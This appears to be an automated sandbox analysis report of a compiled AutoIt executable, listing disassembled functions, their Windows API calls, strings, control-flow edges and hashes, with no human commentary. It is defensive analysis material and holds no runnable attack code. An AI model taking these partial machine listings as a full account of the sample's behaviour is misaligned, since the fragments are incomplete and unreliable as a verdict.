                                                      • Part of subcall function 006539D5: ShowWindow.USER32(00000000,?,?), ref: 00653A38
                                                      • Part of subcall function 006539D5: ShowWindow.USER32(00000000,?,?), ref: 00653A41
                                                      • Part of subcall function 0065434A: _memset.LIBCMT ref: 00654370
                                                      • Part of subcall function 0065434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00654415
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%n
                                                    • API String ID: 529118366-38505642
                                                    • Opcode ID: 5251bfd97691c1fd634e1c853a78bb535a2d70dd612bbd2669b017dcec207d69
                                                    • Instruction ID: 1c54c66eab212c2e9c525f8f901dc6695697700d22de98654dbebaef41105c00
                                                    • Opcode Fuzzy Hash: 5251bfd97691c1fd634e1c853a78bb535a2d70dd612bbd2669b017dcec207d69
                                                    • Instruction Fuzzy Hash: 5D5107B1D04108EECF05EBB8EC159ED777BBF85741F008169F851B22E1DA78564ACB29
                                                    Function 006549A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1037 6549a0-654a00 call 657667 GetVersionExW call 657bcc 1042 654a06 1037->1042 1043 654b0b-654b0d 1037->1043 1045 654a09-654a0e 1042->1045 1044 68d767-68d773 1043->1044 1046 68d774-68d778 1044->1046 1047 654a14 1045->1047 1048 654b12-654b13 1045->1048 1050 68d77a 1046->1050 1051 68d77b-68d787 1046->1051 1049 654a15-654a4c call 657d2c call 657726 1047->1049 1048->1049 1059 654a52-654a53 1049->1059 1060 68d864-68d867 1049->1060 1050->1051 1051->1046 1053 68d789-68d78e 1051->1053 1053->1045 1055 68d794-68d79b 1053->1055 1055->1044 1057 68d79d 1055->1057 1061 68d7a2-68d7a5 1057->1061 1059->1061 1062 654a59-654a64 1059->1062 1063 68d869 1060->1063 1064 68d880-68d884 1060->1064 1065 68d7ab-68d7c9 1061->1065 1066 654a93-654aaa GetCurrentProcess IsWow64Process 1061->1066 1067 68d7ea-68d7f0 1062->1067 1068 654a6a-654a6c 1062->1068 1069 68d86c 1063->1069 1071 68d86f-68d878 1064->1071 1072 68d886-68d88f 1064->1072 1065->1066 1070 68d7cf-68d7d5 1065->1070 1073 654aac 1066->1073 1074 654aaf-654ac0 1066->1074 1079 68d7fa-68d800 1067->1079 1080 68d7f2-68d7f5 1067->1080 1075 654a72-654a75 1068->1075 1076 68d805-68d811 1068->1076 1069->1071 1077 68d7df-68d7e5 1070->1077 1078 68d7d7-68d7da 1070->1078 1071->1064 1072->1069 1081 68d891-68d894 1072->1081 1073->1074 1082 654ac2-654ad2 call 654b37 1074->1082 1083 654b2b-654b35 GetSystemInfo 1074->1083 1084 68d831-68d834 1075->1084 1085 654a7b-654a8a 1075->1085 1087 68d81b-68d821 1076->1087 1088 68d813-68d816 1076->1088 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1094 654ad4-654ae1 call 654b37 1082->1094 1095 654b1f-654b29 GetSystemInfo 1082->1095 1086 654af8-654b08 1083->1086 1084->1066 1093 68d83a-68d84f 1084->1093 1090 654a90 1085->1090 1091 68d826-68d82c 1085->1091 1087->1066 1088->1066 1090->1066 1091->1066 1096 68d859-68d85f 1093->1096 1097 68d851-68d854 1093->1097 1102 654ae3-654ae7 GetNativeSystemInfo 1094->1102 1103 654b18-654b1d 1094->1103 1098 654ae9-654aed 1095->1098 1096->1066 1097->1066 1098->1086 1100 654aef-654af2 FreeLibrary 1098->1100 1100->1086 1102->1098 1103->1102
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 006549CD
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • GetCurrentProcess.KERNEL32(?,006DFAEC,00000000,00000000,?), ref: 00654A9A
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00654AA1
                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00654AE7
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00654AF2
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00654B23
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00654B2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 6be04704ecf5f40ab166dbff4d08af5da2a8e53fc45438de2bdfff11510b44f2
                                                    • Instruction ID: c63488a068075acd27426e6a1f30e43d48bf06ffdad0c4a068a655039765fc58
                                                    • Opcode Fuzzy Hash: 6be04704ecf5f40ab166dbff4d08af5da2a8e53fc45438de2bdfff11510b44f2
                                                    • Instruction Fuzzy Hash: 6891053198A7C0DEC731DB6894501EABFF6AF29305F084AAED4C783B41D621A54CC76D
                                                    Function 00654E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1104 654e89-654ea1 CreateStreamOnHGlobal 1105 654ec1-654ec6 1104->1105 1106 654ea3-654eba FindResourceExW 1104->1106 1107 654ec0 1106->1107 1108 68d933-68d942 LoadResource 1106->1108 1107->1105 1108->1107 1109 68d948-68d956 SizeofResource 1108->1109 1109->1107 1110 68d95c-68d967 LockResource 1109->1110 1110->1107 1111 68d96d-68d98b 1110->1111 1111->1107
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00654D8E,?,?,00000000,00000000), ref: 00654E99
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00654D8E,?,?,00000000,00000000), ref: 00654EB0
                                                    • LoadResource.KERNEL32(?,00000000,?,?,00654D8E,?,?,00000000,00000000,?,?,?,?,?,?,00654E2F), ref: 0068D937
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00654D8E,?,?,00000000,00000000,?,?,?,?,?,?,00654E2F), ref: 0068D94C
                                                    • LockResource.KERNEL32(00654D8E,?,?,00654D8E,?,?,00000000,00000000,?,?,?,?,?,?,00654E2F,00000000), ref: 0068D95F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: fe998011a95195aff538fe1d49f4742d611e8f16d2ed4843ff54f53d7deae75c
                                                    • Instruction ID: a384429b38f4ae8e537f101f661476eede8ce4cb5a84f6d4f0b1826a5c8b4449
                                                    • Opcode Fuzzy Hash: fe998011a95195aff538fe1d49f4742d611e8f16d2ed4843ff54f53d7deae75c
                                                    • Instruction Fuzzy Hash: D0119A70600300BFD7218BA5EC49F677BBBFBC5B12F2482ADF80686250DB61E8448A60
                                                    Function 0065E6A0 Relevance: 6.1, Strings: 4, Instructions: 1102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Ddq$Ddq$Variable must be of type 'Object'.$+
                                                    • API String ID: 0-143587551
                                                    • Opcode ID: f5e0c83e474cb994701755d3f6f48b878e2d59e9e1e7ac0b06e0d2d59e1e7566
                                                    • Instruction ID: a8091fe9e6a2efc8b3dafcbb96e3a13539bc349749cbba872b37e3acf37fbcd0
                                                    • Opcode Fuzzy Hash: f5e0c83e474cb994701755d3f6f48b878e2d59e9e1e7ac0b06e0d2d59e1e7566
                                                    • Instruction Fuzzy Hash: 62A26A75A00215CBCF28CF58C480AAAB7B7FF59311F248169EC159B351D736EE8ACB94
                                                    Function 006B445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,0068E398), ref: 006B446A
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 006B447B
                                                    • FindClose.KERNEL32(00000000), ref: 006B448B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 277565d88dfd0814a71abe8eaf93aa1e906f2770a06722244192ecf353f5d732
                                                    • Instruction ID: 778b04db3f8a4475c8d8069b2712e4059b56eb1f27b440b1b0689d5e30d4814f
                                                    • Opcode Fuzzy Hash: 277565d88dfd0814a71abe8eaf93aa1e906f2770a06722244192ecf353f5d732
                                                    • Instruction Fuzzy Hash: B4E0DF728119006B8310AB78EC0D8EA779EDE05335F200726F836C21E1EBB49E9096D6
                                                    Function 006609D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00660A5B
                                                    • timeGetTime.WINMM ref: 00660D16
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00660E53
                                                    • Sleep.KERNEL32(0000000A), ref: 00660E61
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00660EFA
                                                    • DestroyWindow.USER32 ref: 00660F06
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00660F20
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00694E83
                                                    • TranslateMessage.USER32(?), ref: 00695C60
                                                    • DispatchMessageW.USER32(?), ref: 00695C6E
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00695C82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbq$pbq$pbq$pbq
                                                    • API String ID: 4212290369-3732479470
                                                    • Opcode ID: 8ecb5cb783ca89f882e3ff45dbae347ff09ec5c0317ce4ec4176cec58bf99c36
                                                    • Instruction ID: 1d72c8bb6e80d511bbebbdcb6e14137692fe76ba78049843ec00aaf9971011f7
                                                    • Opcode Fuzzy Hash: 8ecb5cb783ca89f882e3ff45dbae347ff09ec5c0317ce4ec4176cec58bf99c36
                                                    • Instruction Fuzzy Hash: 3FB2F370608741DFDB25DF24C884BAAB7E6BF84304F14892DF84A973A1CB75E845CB86
                                                    Function 006B9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 006B8F5F: __time64.LIBCMT ref: 006B8F69
                                                      • Part of subcall function 00654EE5: _fseek.LIBCMT ref: 00654EFD
                                                    • __wsplitpath.LIBCMT ref: 006B9234
                                                      • Part of subcall function 006740FB: __wsplitpath_helper.LIBCMT ref: 0067413B
                                                    • _wcscpy.LIBCMT ref: 006B9247
                                                    • _wcscat.LIBCMT ref: 006B925A
                                                    • __wsplitpath.LIBCMT ref: 006B927F
                                                    • _wcscat.LIBCMT ref: 006B9295
                                                    • _wcscat.LIBCMT ref: 006B92A8
                                                      • Part of subcall function 006B8FA5: _memmove.LIBCMT ref: 006B8FDE
                                                      • Part of subcall function 006B8FA5: _memmove.LIBCMT ref: 006B8FED
                                                    • _wcscmp.LIBCMT ref: 006B91EF
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9824
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9837
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006B9452
                                                    • _wcsncpy.LIBCMT ref: 006B94C5
                                                    • DeleteFileW.KERNEL32(?,?), ref: 006B94FB
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006B9511
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006B9522
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006B9534
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: 388fb0402990cf2e2024438c528174f2dca8b0e1d00e983a94bea1b7c649cadc
                                                    • Instruction ID: fdcfd82ac062b9382b5bc524a6b16095d5f657cd30aa6d96d959b9414992ef60
                                                    • Opcode Fuzzy Hash: 388fb0402990cf2e2024438c528174f2dca8b0e1d00e983a94bea1b7c649cadc
                                                    • Instruction Fuzzy Hash: 9BC11EB1D00219ABDF61DFA5CC85ADEB7BEEF45310F0040AAF609E7151DB309A858F65
                                                    Function 0065708B Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00654706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007152F8,?,006537AE,?), ref: 00654724
                                                      • Part of subcall function 0067050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00657165), ref: 0067052D
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006571A8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0068E8C8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0068E909
                                                    • RegCloseKey.ADVAPI32(?), ref: 0068E947
                                                    • _wcscat.LIBCMT ref: 0068E9A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$xV
                                                    • API String ID: 2673923337-3671864596
                                                    • Opcode ID: cf018354d5c14a80a66f805d74abad8cf428fdcb649a9e40d6c96dc79e6f8282
                                                    • Instruction ID: cf3d5010faef7692e54ba61fc3903142e629b2d97e9ca355a24e0646fa073f00
                                                    • Opcode Fuzzy Hash: cf018354d5c14a80a66f805d74abad8cf428fdcb649a9e40d6c96dc79e6f8282
                                                    • Instruction Fuzzy Hash: B471A0715093019EC750EF29EC519ABBBEAFF88350F40852EF845872A0EB759948CB5A
                                                    Function 00653015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00653074
                                                    • RegisterClassExW.USER32(00000030), ref: 0065309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 006530CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
                                                    • LoadIconW.USER32(000000A9), ref: 006530F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 806bf60b209d6a7177a9ddd2ecf56247f6c0a5bbbd074ecaea885aa633ad2ec2
                                                    • Instruction ID: 8f2401f3d4325b2437c808e361262b2b05b4fd68c67b76385d3e727d8a402b34
                                                    • Opcode Fuzzy Hash: 806bf60b209d6a7177a9ddd2ecf56247f6c0a5bbbd074ecaea885aa633ad2ec2
                                                    • Instruction Fuzzy Hash: 8D3118B1D41349EFDB10CFA8EC88ADDBBF1FB09310F14812AE581A62A0D3B90645CF55
                                                    Function 00653041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00653074
                                                    • RegisterClassExW.USER32(00000030), ref: 0065309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 006530CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
                                                    • LoadIconW.USER32(000000A9), ref: 006530F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: c2267421b1c30a950ac9b7b802edcdc0458d6a0faf5b0f3f5e426292d401a308
                                                    • Instruction ID: 2abf4240cd9e39dfd47b20539f0ec8eab49fa8df3063b8f58182bb5a845dbc53
                                                    • Opcode Fuzzy Hash: c2267421b1c30a950ac9b7b802edcdc0458d6a0faf5b0f3f5e426292d401a308
                                                    • Instruction Fuzzy Hash: D721C4B1D11218EFDB00DFA8EC89BDDBBF5FB08700F04912AF911AA2A0D7B546448F95
                                                    Function 00653633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 760 653633-653681 762 6536e1-6536e3 760->762 763 653683-653686 760->763 762->763 764 6536e5 762->764 765 6536e7 763->765 766 653688-65368f 763->766 767 6536ca-6536d2 DefWindowProcW 764->767 768 68d0cc-68d0fa call 661070 call 661093 765->768 769 6536ed-6536f0 765->769 770 653695-65369a 766->770 771 65374b-653753 PostQuitMessage 766->771 773 6536d8-6536de 767->773 803 68d0ff-68d106 768->803 774 653715-65373c SetTimer RegisterWindowMessageW 769->774 775 6536f2-6536f3 769->775 777 6536a0-6536a2 770->777 778 68d154-68d168 call 6b2527 770->778 772 653711-653713 771->772 772->773 774->772 783 65373e-653749 CreatePopupMenu 774->783 780 68d06f-68d072 775->780 781 6536f9-65370c KillTimer call 65443a call 653114 775->781 784 653755-653764 call 6544a0 777->784 785 6536a8-6536ad 777->785 778->772 797 68d16e 778->797 790 68d0a8-68d0c7 MoveWindow 780->790 791 68d074-68d076 780->791 781->772 783->772 784->772 786 68d139-68d140 785->786 787 6536b3-6536b8 785->787 786->767 802 68d146-68d14f call 6a7c36 786->802 795 6536be-6536c4 787->795 796 68d124-68d134 call 6b2d36 787->796 790->772 799 68d078-68d07b 791->799 800 68d097-68d0a3 SetFocus 791->800 795->767 795->803 796->772 797->767 799->795 804 68d081-68d092 call 661070 799->804 800->772 802->767 803->767 808 68d10c-68d11f call 65443a call 65434a 803->808 804->772 808->767
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 006536D2
                                                    • KillTimer.USER32(?,00000001), ref: 006536FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0065371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0065372A
                                                    • CreatePopupMenu.USER32 ref: 0065373E
                                                    • PostQuitMessage.USER32(00000000), ref: 0065374D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated$%n
                                                    • API String ID: 129472671-3795218793
                                                    • Opcode ID: fe0556bd3766f26b5ff8819a42797901981db4e511c79cdf3e6aee0e039d3144
                                                    • Instruction ID: 694b9140d0aa953dd334442b5c5ae6e31568cff1b4b08a161abf037290c905c1
                                                    • Opcode Fuzzy Hash: fe0556bd3766f26b5ff8819a42797901981db4e511c79cdf3e6aee0e039d3144
                                                    • Instruction Fuzzy Hash: 0D4159B2600515FBCB186F28EC19BF93797EB44782F14412DFD02863E1CA759E4A9329
                                                    Function 00653A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00653A50
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00653A5F
                                                    • LoadIconW.USER32(00000063), ref: 00653A76
                                                    • LoadIconW.USER32(000000A4), ref: 00653A88
                                                    • LoadIconW.USER32(000000A2), ref: 00653A9A
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00653AC0
